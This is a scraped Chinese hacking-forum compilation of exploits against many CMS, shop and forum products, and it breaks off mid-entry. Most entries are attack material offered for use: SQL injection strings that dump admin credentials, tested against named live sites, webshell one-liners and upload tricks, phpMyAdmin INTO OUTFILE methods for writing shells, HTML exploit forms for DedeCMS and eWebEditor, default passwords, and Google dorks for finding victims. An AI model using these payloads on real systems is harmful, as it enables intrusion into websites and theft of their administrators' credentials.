启航企业建站系统 cookie注入漏洞通杀所有版本7 Y. N w! U: ?$ o/ }
( I7 T1 f- B+ d2 N
直接上exploit:1 z' Y# D+ B6 ^2 ^" ?& y5 ?
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
, s' k4 d1 _3 |. ttest:http://www.tb11.net/system/xitong/shownews.asp?id=210: y4 X9 B7 i, G0 |" Y' f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( x+ T0 }& W- O
Asprain论坛 注册用户 上传图片就可拿到webshell7 `, K- w- J! Q& h
5 H! Q6 c) W4 r7 r5 m W( \Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
" n. P e N0 K# k% K$ V+ H1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
* ~/ Z, e8 _ ?. X2.gif 为一小图片文件,一定要小,比如qq表情图片
: O" B# S) \* t% L4 J _% h" x3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用 d6 l1 _7 i: Y8 Q5 G- y
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
% L4 M# U% I7 U6 s* Z" p5.q.asp;.gif6 K/ I6 X7 A A2 y: _
google:Powered by Asprain ?% y$ B: u6 |6 s* p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 \# U9 P. C7 Z6 l; ~9 A& R) {. ~ ?: O
! }# _. m$ ~/ \ShopNum1全部系统存在上传漏洞。" s) C; c7 ^/ P: C) D$ X8 K
; s6 t; R3 h5 I% u+ J$ f
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
& |0 Z1 @* a0 L$ i' N按说明 提示登录后台。。
6 I: U0 K T1 `5 J在后台功能页面->附件管理->附件列表6 |* J: I- s; X; G9 H% ?: @
可以直接上传.aspx 后缀木马+ R3 J; |& T' D, D, Q$ \% J( ]
http://demo.shopnum1.com/upload/20110720083822500.aspx
3 O" B6 {" D: C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ y* r g: u; x# R: d# M' o9 I$ N3 S. }# q7 |: p9 w c
牛牛CMS中小企业网站管理系统 上传漏洞
4 G1 ^1 s% i* Z2 p# {1 b4 D& {) W4 A: `& Q
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
) H5 p) P' }$ x! c8 }后台:admin/login.asp8 S0 A- t1 y( _- w- O. [) g
ewebeditor 5.5 Nday, {; K" N: q7 z+ n$ b$ n' [- v- c
exp:
) X: [. H+ b4 E1 Z; k7 M3 {<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?+ @5 ? @& b, k3 M% ]. P# o% d
<input?type=file?name=uploadfile?size=100><br><br>? _, S2 n2 E; _7 i- G( q( ]
<input?type=submit?value=upload>?
; z: j& \2 g2 }" s, O</form>" `% ], J; M9 ~8 |5 x6 m; a4 L
ps:先上传小马.
9 J4 h+ p2 F; ~# n; |. f9 |; Cinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
1 o$ f- |0 c: o5 Q
u4 t( ?2 _; [, I. _+ c--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 O7 Q$ B; q6 I! W" C; H6 \! p- }% }9 V- x% m0 I" I
YothCMS 遍历目录漏洞
( q) t2 `: \8 c( h9 ]& s
9 y# C; J% f8 p4 m优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
6 S: C4 k5 G ?) ?默认后台:admin/login.asp! ]6 M+ u8 N- m* d& R
遍历目录:
2 G. _- F) ]2 ^- Jewebeditor/manage/upload.asp?id=1&dir=../
8 F, `' `% Z7 [9 m; ^+ L4 g) c7 z4 G+ Cdata:5 O8 Z6 q$ o3 y' s' X0 P
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
4 X3 f3 x- s0 A4 L" E--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& P% r4 o: ~+ O5 X
5 Y- w% ^7 B5 ~# q) ?Net112企业建站系统 1.0- q% O" m+ A) C1 c4 B
: h) J; t- a5 y0 x
源码简介:
6 E1 r$ B4 V8 k+ z6 v. b, x; k9 tNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
1 M3 w7 P' i& x, B9 V添加管理员:
6 a* O& s% C4 k8 G2 ]) n, ihttp://www.0855.tv/admin/admin.asp?action=add&level=2/ U' v3 L' e# o* i) ?
其实加不加都不是很重要,后台文件都没怎么作验证。
& J1 }) r7 w {- I: ?上传路径:9 C9 F5 s- g, m; d
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
" ^5 n7 |2 L% _http://www.0855.tv/inc/Upfile.asp?Stype=2
6 X7 S! P7 N% d" e% b( g怎么利用自己研究。
/ x5 d* Z' S' u4 J) G H9 K遍历目录:
: |6 r& b+ Z; K1 _ Vhttp://www.0855.tv/admin/upfile.asp?path=../..3 ^; R$ w' q3 I+ c; v
如:( R1 i2 H* R! V- q; e7 S8 D/ P# n
http://www.0855.tv/admin/upfile.asp?path=../admin) m! m8 t3 ?5 z6 r+ v- w
http://www.0855.tv/admin/upfile.asp?path=../data; \, W2 ?- f0 ]. D5 m, {& Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 P6 k4 J) d- V7 |' l: Y
8 X5 l# s, P6 v1 C易和阳光购物商城通杀 上传漏洞/ W" d6 k# ]* L
, U8 H1 L8 {/ z/ B% P' p. W- z前提要求是IIS6.0+asp坏境。2 i' `; ~4 w$ I
漏洞文件Iheeo_upfile.asp
4 { H* B# p; ]( \; Y过滤不严.直接可以iis6.0上传" e4 ]/ g% U# j7 g6 r/ @
把ASP木马改成0855.asp;1.gif
/ {2 B- J' G& f: A' @直接放到明小子上传2 D5 D. E/ q, a' _+ I0 X: f- w& u
Google搜索:inurl:product.asp?Iheeoid=
( d C0 C$ q' w2 t% N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 ?0 c1 [) [' }( w3 l
[: Y* ?' j; Y' c5 B! }. rphpmyadmin后台4种拿shell方法
8 ` d$ `+ |' L- ~- q% T' L3 H+ ^4 l* u1 a$ {- Q% n
方法一:
4 }$ U6 T2 D" _) Q) Z; rCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
1 R" F; [" }6 s$ F% D( hINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
- Y4 i' R; W6 w* ?5 [: mSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
/ r/ s9 r k U, y: X2 B----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 o3 e6 j" \/ @一句话连接密码:xiaoma
6 f0 t/ ^, v7 C; n0 v1 \2 X方法二:
0 G2 G; [6 ]# t$ |( U5 D6 Y, M) MCreate TABLE xiaoma (xiaoma1 text NOT NULL);
7 J6 i# ^4 o6 f- ~4 |) H4 ^Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');# Y4 ~. N/ j- [; | ]( s4 J" L
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
3 F+ ?% Q7 ~7 w4 a- LDrop TABLE IF EXISTS xiaoma;
: t: f* j" K# F) Y% X方法三:
# M9 Y& f; w& V0 L6 R5 ^读取文件内容: select load_file('E:/xamp/www/s.php');
1 y0 [! s& X3 b9 H写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 G2 {1 l* E# ^' k" S0 \' }cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 b7 G; \& s1 E* J- Z方法四:
6 m: [' Z/ K' \# \$ B e1 S) pselect load_file('E:/xamp/www/xiaoma.php');
8 b; w, L# p+ [' Z: pselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'6 R1 H& ^ l2 S) p8 p1 F
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
* \* n& N0 L! N- [6 J1 n- {--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- M: B9 t# I' [6 h
& L& c% t7 n+ K7 }7 \' ?9 ^, C. b
传信网络独立开发网站源码0day漏洞
, t% i- @; y$ `9 [ i0 B- O1 a$ r0 z5 m* C
后台system/login.asp
2 ^ |; d% t" B5 u进了后台有个ewebeditor: I! V& y% k4 ?+ u+ y
Google 搜索inurl:product1.asp?tyc=! |1 J0 R+ v. g
编辑器漏洞默认后台ubbcode/admin_login.asp( _, O# s. U# }* E, s% Q
数据库ubbcode/db/ewebeditor.mdb! o9 _9 S) y, O' F% l5 Z
默认账号密码yzm 111111
) M4 s# k, W$ z+ {- n6 `
5 x( J/ h5 t: n. c拿webshell方法
/ k) x4 W2 I6 @1 d5 ~( H登陆后台点击“样式管理”-选择新增样式
& H7 s2 a% o: v1 i6 V样式名称:scriptkiddies 随便写 1 i) P0 i" S: f; K+ Y g) W
路径模式:选择绝对路径 t- T: W, [# c0 r7 v2 B
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx" L% A' w: O, V
图片类型比如就是我们要上传的ASP木马格式
: I, e! C' Z! z# g5 _# S' x6 @上传路径:/9 ^5 Z+ w, g; v. x+ W3 l- X
图片限制:写上1000 免的上不了我们的asp木马
/ A& `7 |- }" L) J: {+ A上传内容不要写
! P1 Z3 r1 C9 I* X可以提交了 % R1 R! H0 x# D5 r
样式增加成功!
- B% n# r0 {9 i/ @5 \返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
0 ^4 N) G, k* N# C* p按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置! F0 }) d4 L( P8 i: }8 V0 h
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies+ v/ \9 U% H, j* c. N2 C/ [
上ASP木马 回车 等到路径3 U1 _, f Y* F; h
+ T) L# K& d0 b; a& s
后台:system/login.asp
: G! P: b% p A0 G5 q9 ~Exp:6 @8 M. u# S2 \2 F! ]; `- }4 }
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master6 U5 f y% B! `) Z) h! q6 M8 }: }
测试:% W" L" |2 e8 s0 [( _
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
) y/ @7 T6 b" ?: E6 Vhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
) L' c( q# ^1 @9 i0 J4 N \. H--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 k/ k4 H$ B& D
?1 V. V( {5 a- zfoosun 0day 最新注入漏洞5 c# M; d( z; q" [5 ?( S3 j/ p
! V; S W! _% n T4 L2 D漏洞文件:www.xxx.com/user/SetNextOptions.asp
" w1 A1 p m3 [利用简单的方法:: o z/ _# E( y' }* I/ R5 J
暴管理员帐号:, q' A4 F5 O9 o( W1 n
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
1 r' f- H) ?% n! \, @9 `暴管理员密码:
. d4 E, }3 c1 w0 Whttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
" G. O3 n: y; C# P5 {1 z; n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# j% O8 V) o% I' d4 O& M+ s9 k' o# F V
网站程序的版权未知!
e) q' h* L: z" r9 T2 T
7 \& k6 W0 s9 L/ j5 p默认网站数据库:9 g! t/ e$ R- ] b+ j
www.i0day.com/data/nxnews.mdb
5 n2 O' `- n2 w+ Y$ bewebeditor 在线编辑器:% n+ }% l# n6 Q' a
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb' R# U9 j/ r0 N2 \
登录地址:ewebeditor/admin_login.asp+ X' s- D) S- }/ u( c- }
默认密码:admin admin
# Y. q4 Z0 I2 c: Z登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
1 g* n3 `6 _+ N4 ?; s- A# K+ p Z% X) O4 b
Sql注入漏洞:
. ?! Q) s7 N7 L' N, H% Phttp://www.i0day.com/detail.asp?id=12
. \$ r6 c, n7 m3 l0 |# {8 X, B# Q8 kexp:" y" d- y8 v! o) o
union select 1,admin,password,4,5,6,7,8 from admin- K+ _* _4 O5 o) ~, ~" ?/ N5 ^" q6 J
爆出明文帐号/密码
( u$ [6 e. V* i* J% S7 x. d. j4 O( M: O( u& s
上传漏洞:2 j4 v- T. q8 H4 ?8 }
后台+upfile.asp: T5 B& ^ [ {* A" }7 f" o
如:' V8 c5 m0 n. R
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
* b) S' H! q2 ]8 cshell的地址:网址+后台+成功上传的马( F6 V2 {( k- H, ]! J
google:inurl:news.asp?lanmuName=
) l5 I5 D: O. I$ b- R, c------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; x, F8 x4 C& C# i# ~: L7 a! H( e* {0 E) a2 B) W M
dedecms最新0day利用不进后台直接拿WEBSHELL
* k X. Z& ]+ i$ |1 `* q8 ~7 b: ^$ k" M
拿webshell的方法如下:
9 A1 }9 O5 e! p' {0 @网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.) [' V; _+ Y' }5 t1 V9 \, y/ I
前题条件,必须准备好自己的dede数据库,然后插入数据:
; d# L( a ~' J. Finsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ' n7 C8 G( j! H6 Q3 ?; F3 e; C7 C+ l/ J
8 D) z( I* K' @/ J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。/ S; a# h0 ?# R( B- z# p+ C
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
1 @; H) F K Q<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />* x9 k) ?0 Y2 y$ x
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />6 \. x' L b$ F
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
' b+ a8 e' t' _- E) q<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />6 s- W/ k1 w4 s; Y; Z. _1 _
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
$ c7 E7 N& o* k0 F* v% L- R& y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />; {6 B g9 T6 ~* G
<input type="text" value="true" name="nocache" style="width:400">
# ^1 t4 S! k/ {, [<input type="submit" value="提交" name="QuickSearchBtn"><br />6 f7 r0 T) Y3 v# u( U; a
</form>& N2 A T& d$ b8 J# ^) O
<script>
4 r0 Y6 E1 V, R+ E. ^- r& s/ k% Rfunction addaction()
* C- J: F: i6 @- X, l8 D{
- W9 m* [. |6 M" q3 q( w' H5 ]document.QuickSearch.action=document.QuickSearch.doaction.value;. U5 M0 M2 [# S* H
}
* w( q1 G! V# F</script>
" f( O5 b' v' Z6 g-----------------------------------------------------------------------------------------------------------------------------------------------; A& Z. \; Q1 d5 H* B& g- n
2 h( N5 m. _! J# s: X& e. A' Mdedecms织梦暴最新严重0day漏洞
& u& L1 I6 G) M: G0 n" ebug被利用步骤如下:
5 \9 K+ {/ k2 i! Xhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root- m1 k# {; v# c* o9 B3 H
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
2 k1 G3 z/ W+ {6 T-------------------------------------------------------------------------------------------------------------------------------------------) @3 S5 k) M6 g% U, b- w/ F/ ~
7 g3 `3 a! m! y, A. g% f; i多多淘宝客程序上传漏洞
/ F/ u$ V9 e) C( y漏洞页面:% ` I# b5 i+ ]' x' K; }
admin\upload_pic.php+ Y4 Y' o+ E! s
传送门:
! Z0 ^7 p+ H1 ^' |) H. |7 `, Bhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1' Y1 p, `% {- Q$ D+ A
PS:copy张图片马 直接 xxx.php 上传抓包地址!5 x" A" C! ~- o& A8 x6 ]
------------------------------------------------------------------------------------------------------------------------------------------------------% l. }4 b! v* o( j
% }1 S+ S# H: Y% \" F" n) j k( |3 e1 Z无忧公司系统ASP专业版后台上传漏洞1 M' d! k& x: u! G; N
漏洞文件 后台上传" \; F2 _+ a S: A) P' s
admin/uploadPic.asp
0 e% V( h: s7 y1 \' u! j漏洞利用 这个漏洞好像是雷池的
7 U* j# _' J! [/ n! p P/ @+ A1 ]( @http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
) H& j* V5 G" r$ o4 | n4 E0 ` {等到的webshell路径:
1 {! |+ k( m; k/ ^! H# Q# S/UploadFiles/scriptkiddies.asp;_2.gif
" s5 m" |7 W( `4 p! Y5 q: G' [7 _---------------------------------------------------------------------------------------------------------------------------------------------------
- o: N7 K7 S% }" E2 N- S) O0 A# \2 H- a; w! L: b' i
住哪酒店分销联盟系统2010
5 x, a2 w: N# e4 G( P( F/ XSearch:" X* H5 \$ K6 Z. q% E
inurl:index.php?m=hotelinfo
! y+ ]* b& L: P3 }# G# J, E7 Nhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
( `+ C6 Y8 K* I9 w% }( `; d& ~默认后台:index.php?m=admin/login
# ]9 L! ]+ w2 h9 X& p; [--------------------------------------------------------------------------------------------------------------------------------------------------
( V5 D* j T* N1 E
9 S9 T! O' t7 n7 c$ Rinurl:info_Print.asp?ArticleID=- _6 j2 i) _* [$ ]) [
后台 ad_login.asp
5 X9 j: M. w9 z3 R爆管理员密码:
: L$ x, A/ ~4 }2 Zunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
6 ^: Y5 a9 m! J( _8 u' @" C7 K& C------------------------------------------------------------------------------------------------------------------------------------------------------------
2 H2 S* ?3 U. p4 k9 l8 O5 ^
1 t3 T8 Q& L! Z! d搜索框漏洞!
: W9 k6 x- O! y/ l3 i% J%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
1 z# ]4 |' G6 v6 s$ c) J--------------------------------------------------------------------------------------------------------------------------------------------------------
5 K* V2 y/ Z- q/ B. `; m: e# u$ G7 L" j
关键字:
0 ?3 L$ a" @# p8 z& U: Oinurl:/reg_TemletSel.asp?step=28 D5 k+ p9 A0 @( I; b# @ I
或者
; X2 I- A v+ o$ I' d, m8 X& x& L1 [电子商务自助建站--您理想的助手
) e2 i: ]+ D+ V0 Z% z# S-------------------------------------------------------------------------------------------------------------------------------------------------
# X( f+ ~8 F0 n2 H1 z% ^0 e. {, u
iGiveTest 2.1.0注入漏洞
5 j5 _: @. ~0 mVersion: <= 2.1.0' R+ N5 Q2 I4 L4 j$ [
# Homepage: http://iGiveTest.com/1 y! f$ H) `, Q9 t1 I+ ~
谷歌关键字: “Powered by iGiveTest”9 \- ^' T6 C+ t+ ?
随便注册一个帐号。然后暴管理员帐号和密码0 F( d& U; \4 q J" |; p3 g
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
# g6 q9 C1 v; F, ?; O U2 E------------------------------------------------------------------------------------------------------------------------------------------------
}' l9 H; I/ \9 i9 ~3 Y7 g
: }/ e) N" f. v' a. S1 H6 LCKXP网上书店注入漏洞; u% F, z. m8 d
工具加表:shop_admin 加字段:admin
. c6 \$ I" {. R5 ]" @: ^后台:admin/login.asp
8 N. v# C. S6 @. H u登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
& ? R/ { Y1 u5 d3 v& iinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
/ Y" Y0 F3 r" e( l4 M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ p7 G/ @0 ]* n7 _: A
+ p* c0 h+ f; y1 y) w! u段富超个人网站系统留言本写马漏洞
/ X, j8 ~2 V. }9 l; O7 z$ D源码下载:http://www.mycodes.net/24/2149.htm' p- K# u( b2 T: i
addgbook.asp 提交一句话。; J: d0 S M" i# z4 c3 ~3 U) w
连接: http://www.xxxx.tv/date/date3f.asp
/ L) ^/ [ g" Q- N2 @* ggoogle:为防批量,特略!# @2 X* W5 I# r
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 d( j" N$ b/ E \$ U6 t8 J+ G
9 |6 B8 K/ ^; i- t/ Q
智有道专业旅游系统v1.0 注入及列目录漏洞. T" e' H8 j$ n( |* D Y8 K& S, _
默认后台路径:/admin/login.asp
~$ ?9 P: Z! E3 W9 M默认管理员:admin0 a- J. D6 U% E! T& @% v$ T% I. S
默认密码:123456
; E6 T' h- E& H, _2 A& g+ ]SQL EXP Tset:
% n" M; x) Z, w5 x. |$ p" Rhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
/ U6 X( k) m6 ?9 T7 o8 Q------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 n3 u7 }( z6 \
I2 _3 `/ b- p- S& uewebeditor(PHP) Ver 3.8 本任意文件上传0day
/ d' s" O+ ?2 fEXP:
/ Z7 f( O9 F8 i<title>eWebeditoR3.8 for php任意文件上EXP</title>
+ E( b0 v" p8 Y& ]! j<form action="" method=post enctype="multip
: W: |0 z* d! {( c' b! C. lart/form-data">
- V0 ^; i/ P* I1 M<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
% z7 D- v" b) Q' _1 X) ?: k& _URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
# ]: W$ q2 j# D, h7 Y<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
# s3 ?" H- y) f4 {' jfile:<input type=file name="uploadfile"><br>
9 @9 f9 b8 F3 {+ I5 K6 ~<input type=button value=submit onclick=fsubmit()>
- P; a+ t; X/ `5 O. K</form><br>
, }, F$ g7 {/ X( h& ?: R3 `<script>
( C- L r% T+ E* W" xfunction fsubmit(){
/ f( }% ~4 E3 b% _" V$ v! k% Rform = document.forms[0];
; x; }0 N* \( d. L* Uform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
) V" Y9 O) p' g# X0 }0 o9 D# N. {( lalert(form.action); % r# d5 {9 ]9 r9 c
form.submit();
2 k, B$ }: f* v& ^; B+ N} 9 G: p, ]; |! G* [" ]% A
</script>
" O0 q/ ?! r, f) O6 ~8 ]2 e4 _注意修改里面ewebeditor的名称还有路径。
+ @% ~8 Q$ N- M9 W+ z6 Q---------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 C: `: \! h0 `9 w+ i; X8 ]
. U3 p3 t4 ^# I! W/ j
提交’时提示ip被记录 防注入系统的利用
) R7 c/ A, N+ `网址:http://www.xxx.com/newslist.asp?id=122′2 @7 X- A( w2 V7 e U
提示“你的操作已被记录!”等信息。7 F8 j: S; y( g6 \1 w9 _: t; P
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。$ ]/ ^! S' T; L
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------# C6 E$ ]( K% V# O
$ h w9 w* f8 v9 K! d' h
西部商务网站管理系统 批量拿shell-0day
% v( V# D4 s0 ?, L# m这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
7 h! T- l B% u1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛; L" q! V) A& D
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
P5 C4 ~8 J: J5 g3 t( Z/ E3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂" h# \" _$ y( V2 n( z* r* E
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ u, y% a3 H- n! `; h% k
; T V- \$ T! R- M* t. R2 x8 xJspRun!6.0 论坛管理后台注入漏洞 q# ~% d+ A/ D9 c7 l2 [ B9 U3 x
* C% G& j1 `5 x6 P7 D* E @7 r. T6 SSEBUG-ID:20787 发布时间:2011-04-30 影响版本:4 a; a4 O& |0 g# l$ G. P& I1 Y
JspRun!6.0
, c ^, N: u6 J2 }漏洞描述:: s1 D4 i# |: O9 }, j( x5 j
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。) v( P4 T6 @7 \" r* R+ Y- K
在处理后台提交的文件中ForumManageAction.java第1940行/ r2 ?2 z% }. p& [' t
String export = request.getParameter("export");//直接获取,没有安全过滤
. O1 H6 k: ~* @/ Jif(export!=null){
( E b8 R$ O% ~% u% N, nList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...) ?* _$ F1 w" v. R- M4 W+ f' X
if(styles==null||styles.size()==0){
8 S& J) l$ f) {( M<*参考7 I- d* ~$ E5 X- Y" x
nuanfan@gmail.com
% f( n3 d. ^# r! c1 n6 d, m. u/ m*> SEBUG安全建议:
9 s' C$ S0 M* \2 E! R5 I3 P0 o* O6 G. Ywww.jsprun.net" D9 n1 @5 V7 V; z
(1)安全过滤变量export
$ d/ B- i5 T0 o* s: S0 {* u" K- Y(2)在查询语句中使用占位符. u4 g, C$ j3 S: E' [2 N- p
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------* e1 ?1 I. x$ f2 K
. A) P' `: ]4 k# o乌邦图企业网站系统 cookies 注入) l2 G; \1 F f8 U; S6 t
+ o0 @" ?% N6 ~6 l程序完整登陆后台:/admin/login.asp6 H% b3 ^1 T9 l0 X ]
默认登陆帐号:admin 密码:admin888
- x7 [6 ]4 m# x+ n/ h语句:(前面加个空格)
3 H% u; S5 U) ?' W: A, i$ uand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
( W8 T+ E1 h8 i X或者是16个字段:
7 A% I! {: K. o$ wand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin3 @5 J/ \- r* S a- i+ _3 k; p+ D
爆不出来自己猜字段。0 S7 t" I- }9 W$ h! Y
注入点:http://www.untnt.com/shownews.asp?=88
5 \# P8 J0 h. C, F" l9 qgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
: Y' U- u; c+ G关键字:% Y X! J# K) V
inurl:shownews?asp.id=4 O- y4 m4 U; Z" o& D$ u9 z/ `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# p) I* q- k( C+ W5 ?; p5 h: Z+ {4 ^4 H
CKXP网上书店注入漏洞
( N" w1 ? l2 t. v6 x: O; o* `2 Y& x# O
工具加表:shop_admin 加字段:admin
8 e/ I0 }$ X/ S0 x, t' |后台:admin/login.asp , ^/ ]% ?8 \) `9 c5 g- }
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/# L8 m) D( H2 G7 G
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息: ~3 j- h# f( K; ]+ v$ m. \! L
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' {$ _1 b0 g2 O* z0 H, Y0 `6 g+ o7 _
YxShop易想购物商城4.7.1版本任意文件上传漏洞 z$ ?9 l4 a% M( b; h# Q2 [
" Z# Y3 j5 W. h6 C& Z% Fhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
7 p, T8 S: o0 C1 C5 y跳转到网站根目录上传任意文件。
; Q7 [" b% a8 O1 k* r# d% M如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
